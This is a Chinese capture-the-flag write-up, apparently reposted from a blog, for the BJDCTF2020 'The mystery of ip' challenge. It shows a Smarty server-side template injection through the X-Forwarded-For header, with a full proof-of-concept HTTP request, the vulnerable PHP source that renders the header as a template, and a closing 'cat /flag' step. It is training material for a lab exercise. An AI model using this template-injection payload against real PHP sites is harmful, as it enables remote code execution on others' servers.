• 周二. 8月 16th, 2022

5G编程聚合网

5G时代下一个聚合的编程学习网

热门标签

web | [BJDCTF2020]The mystery of ip

admin

11月 28, 2021

跟ip相关,联想到xff注入,试了一下发现没用,再试ssti,成功。

php的模板注入,使用的是smarty模板。
poc:

GET /flag.php HTTP/1.1
Host: node4.buuoj.cn:28612
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://node4.buuoj.cn:28612/hint.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: {{phpinfo()}}

读到源码:

    <?php
    	require_once('header.php');
		require_once('./libs/Smarty.class.php');
		$smarty = new Smarty();
		if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
		{
		    $ip=$_SERVER['HTTP_CLIENT_IP'];
		}
		elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
		{
		    $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
		}
		else
		{
		    $ip=$_SERVER['REMOTE_ADDR'];
		}
		//$your_ip = $smarty->display("string:".$ip);
		echo "<div class="container panel1">
					<div class="row">
					<div class="col-md-4">	
					</div>
					<div class="col-md-4">
					<div class="jumbotron pan">
						<div class="form-group log">
							<label><h2>Your IP is : ";
		$smarty->display("string:".$ip);
		echo "				</h2></label>
						</div>		
					</div>
					</div>
					<div class="col-md-4">	
					</div>
					</div>
				</div>";
	?>

	</body>
</html></html>				</h2></label>
						</div>		
					</div>
					</div>
					<div class="col-md-4">	
					</div>
					</div>
				</div>
	</body>
</html>

直接cat /flag
over.

本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/15095282.html

发表回复

您的电子邮箱地址不会被公开。